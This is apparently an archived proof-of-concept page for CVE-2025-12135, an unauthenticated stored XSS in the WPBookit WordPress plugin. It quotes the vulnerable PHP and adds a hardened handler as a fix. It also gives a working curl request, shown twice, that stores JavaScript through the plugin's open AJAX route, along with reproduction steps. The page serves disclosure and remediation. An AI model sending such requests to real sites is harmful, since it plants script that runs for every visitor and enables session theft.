Related vulnerability
Title: WordPress plugin WPBookit cross-site scripting vulnerability (CVE-2025-12135)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users set up a personal blog on a server running PHP and MySQL; a WordPress plugin is an add-on application for it. WordPress plugin WPBookit 1.0.6 and earlier contain a cross-site scripting vulnerability: a missing capability check can lead to stored cross-site scripting.
Description
WPBookit <= 1.0.6 - Unauthenticated Stored Cross-Site Scripting
Introduction
# WPBookit <= 1.0.6 - Unauthenticated Stored Cross-Site Scripting
The [WPBookit](https://wordpress.org/plugins/wpbookit/) plugin neither checks the caller's capabilities nor sanitizes the custom CSS/JS code submitted to its `save_custome_code` AJAX endpoint, allowing unauthenticated attackers to store arbitrary JavaScript that executes on every page load, leading to stored XSS and potential session hijacking.
## TL;DR Exploits
```bash
# Basic XSS injection
curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "css_code=/* malicious */&js_code=alert('XSS');"
```
## Details
The vulnerability exists in the `save_custome_code` method of the `WPB_Setting_Controller` class. The plugin registers its AJAX handler on the `wp_ajax_nopriv_` hook as well as the authenticated one, and the route is configured without a nonce, so any visitor can store arbitrary CSS/JS that is then emitted on every page load.
**Vulnerable code** from [`/core/admin/classes/controllers/class.wpb-setting-controller.php:16-25`](https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/controllers/class.wpb-setting-controller.php#L16):
```php
public function save_custome_code(WP_REST_Request $request){
    $css_code= $request->get_param('css_code');
    $js_code= $request->get_param('js_code');
    update_option( 'wpb_custom_code_data', [ 'css_code' => $css_code, 'js_code' => $js_code ]);
}
```
**Code execution** from [`/core/shortcodes/class-wpbookit-shortcode-abstract.php:20-27`](https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/shortcodes/class-wpbookit-shortcode-abstract.php#L20):
```php
$wpb_custom_code= get_option( 'wpb_custom_code_data', [ 'css_code' => '', 'js_code' => '' ]);
wp_add_inline_style( 'wpb-custom-code-css', stripslashes($wpb_custom_code['css_code']));
wp_add_inline_script( 'wpb-custom-code-js', stripslashes($wpb_custom_code['js_code']) );
```
**Unauthenticated access** from [`/core/admin/classes/class.wpb-admin-routes-handler.php:15-16`](https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/class.wpb-admin-routes-handler.php#L15):
```php
add_action( "wp_ajax_wpb_ajax_post", [ $this, 'wpb_ajax_post' ] );
add_action( "wp_ajax_nopriv_wpb_ajax_post", [ $this, 'wpb_ajax_post' ] );
```
**Route configuration** from [`/core/admin/classes/class.wpb-admin-routes.php:118-123`](https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/class.wpb-admin-routes.php#L118):
```php
'save_custome_code' => [
    'method' => 'post',
    'action' => 'WPB_Setting_Controller@save_custome_code',
    'nonce' => 0,
    'module' => 'setting-controller'
],
```
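The four snippets above show the three missing controls together: no capability check in the handler, no nonce on the route, and a `wp_ajax_nopriv_` registration that exposes the handler to anonymous visitors. The following is an added example of what a hardened handler for the same option looks like; it is not WPBookit's code and does not rely on the plugin's routing table (whose `nonce` flag semantics are not shown on this page). The hook name `wp_ajax_wpb_save_custom_code`, the function name `wpb_example_save_custom_code`, the nonce action `wpb_save_custom_code` and the size limit are assumptions chosen for illustration; only the option name `wpb_custom_code_data` comes from the plugin.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for
// WPB_Setting_Controller::save_custome_code(). Names other than the
// option key 'wpb_custom_code_data' are assumptions for illustration.

// 1. Register the handler for logged-in users only. Because there is no
//    matching wp_ajax_nopriv_ hook, anonymous POSTs to admin-ajax.php for
//    this action are rejected by WordPress before any plugin code runs.
add_action( 'wp_ajax_wpb_save_custom_code', 'wpb_example_save_custom_code' );

function wpb_example_save_custom_code() {
    // 2. Capability check: site-wide custom code is a settings change, so
    //    require manage_options (administrators on a single site).
    //    wp_send_json_error() terminates the request after responding.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Nonce check against CSRF: the admin UI must send the nonce created
    //    with wp_create_nonce( 'wpb_save_custom_code' ) as _ajax_nonce.
    //    check_ajax_referer() dies with a -1 response when it fails.
    check_ajax_referer( 'wpb_save_custom_code', '_ajax_nonce' );

    // 4. Sanitize the CSS: strip every tag so the stored value cannot carry a
    //    closing </style> followed by <script>. WordPress adds slashes to
    //    $_POST, so unslash before storing (the render path should then not
    //    call stripslashes() a second time).
    $css_code = '';
    if ( isset( $_POST['css_code'] ) ) {
        $css_code = wp_strip_all_tags( wp_unslash( $_POST['css_code'] ) );
    }

    // Custom JS is executable by design, so only users who may already
    // publish raw script (the unfiltered_html capability) can store it;
    // anyone else gets an empty value instead of silently mangled code.
    $js_code = '';
    if ( isset( $_POST['js_code'] ) && current_user_can( 'unfiltered_html' ) ) {
        $js_code = wp_unslash( $_POST['js_code'] );
    }

    // 5. Bound the payload so the options table cannot be used as storage.
    //    The 64 KiB limit is an assumed, arbitrary ceiling.
    if ( strlen( $css_code ) > 65535 || strlen( $js_code ) > 65535 ) {
        wp_send_json_error( array( 'message' => 'Custom code too large.' ), 400 );
    }

    update_option(
        'wpb_custom_code_data',
        array( 'css_code' => $css_code, 'js_code' => $js_code )
    );
    wp_send_json_success();
}
```

The capability check is the control whose absence CVE-2025-12135 describes; the nonce and the `nopriv` removal are the two accompanying defences a reviewer would expect on any settings-writing AJAX handler. Splitting the JS branch on `unfiltered_html` keeps the feature usable for administrators while making it impossible for a lower-privileged account to plant script that runs for every visitor.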
## Manual Reproduction
1. **Identify target** with WPBookit plugin installed
2. **Inject malicious JavaScript**:
```bash
curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "css_code=/* malicious */&js_code=alert('XSS');"
```
3. **Verify injection** by visiting any page on the site - the alert will execute
4. **Check persistence** - the malicious code is stored in the database and executes on every page load
File snapshot
[4.0K] /data/pocs/cf6af9e8df3fba36840b6b298a86e9637c46c90a
└── [3.1K] README.md
1 directory, 1 file
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has gone offline or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for or donating to the local PoC. Thank you for your support.